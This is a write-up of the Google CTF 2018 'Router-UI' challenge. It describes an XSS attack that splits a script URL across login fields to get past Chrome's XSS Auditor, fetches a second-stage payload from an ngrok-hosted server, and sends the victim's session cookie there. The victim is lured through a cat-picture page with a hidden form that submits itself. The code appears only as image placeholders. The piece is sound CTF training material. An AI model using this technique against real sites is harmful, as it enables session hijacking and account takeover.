Write-Up: Google CTF 2018 - Router-UI

The last days I began to solve some of the Google CTF 2018 Beginner Challenges together with a workmate. After solving about half of them we got to the challenge named “Router-UI”.

Write-Up: Google CTF 2018 - Router-UI

So it was about finding an XSS vulnerability on the supplied webpage. XSS stands for Cross-site scripting and specifies a vulnerability where the attacker injects client-side scripts into a webpage with the aim of getting the session token of the user or perform other malicious actions like manipulating user interaction or logging keystrokes.

We quickly took a look at the page and were presented with a simple login page of the “OffHub Management Interface”.

I tested the login with some random credentials and got an interesting return.

First I ignored this weird formatting of the wrong credentials and tried to inject some javascript directly in the username field. Unfortunately Chromes XSS Auditor caught this attempt directly. I again took a look at the page they displayed when I entered the wrong credentials. They separated the username and password with two slashes. Like the two slashes used in each URL after the protocol name. So what about injecting two portions of Javascript that execute the real payload on another server.

This is what we need to inject. I removed the password masking so you can see the second part.

The payload obviously has to retrieve the victims session token and somehow send it to us. This code was what we came up for the XSS payload that should steal the victims session token from the cookies:

google_ctf_code_1.png

We now wrote a quick & dirty express-server to publish an endpoint to that our second payload would send the victims session token. Then we could host it temporarily with ngrok.

google_ctf_code_2.png

Then we noticed that we had one problem we didn't address till this time. We had to somehow trick the victim to inject evil script onto the webpage. The description of the challenge reads: “If you claim your link includes cat pictures, I’m sure Wintermuted will click it.” 

So we quickly crafted some HTML with a cute cat picture and a hidden copy of the login form we saw on the original webpage that would on load immediately submit itself with an action attribute pointing to https://router-ui.web.ctfcompetition.com/login. Then we set the input values to our first XSS payload that would then load the real payload from our server.

 

As you can see we set the username input fields value to “https:” and the password input fields value to the ngrok address plus the path to our payload. We can omit the slashes because they are already present in the HTML when we get the “wrong credentials” output. By doing so we can bypass Chromes XSS auditor and load our payload.

google_ctf_code_3.png

Finally we added some code in the express server to serve the static HTML (presenting our cat content) and our Javascript payload and started ngrok to test everything. For testing we just created a fake session token on the router-ui webpage and opened our cat-content html page.

It worked! After jumping for joy I crafted an email with the link to our page and sent it to the specified email-address. We had to wait for some seconds and then we saw the session cookie arriving in our server logs. Yes, we got 'em!

After importing the session token we got the admin page.

To get the flag we just had to look up the value of the password input field in Chrome DevTools.

You can find the whole code for the exploit on GitHub: https://git.io/fNvgw

Share: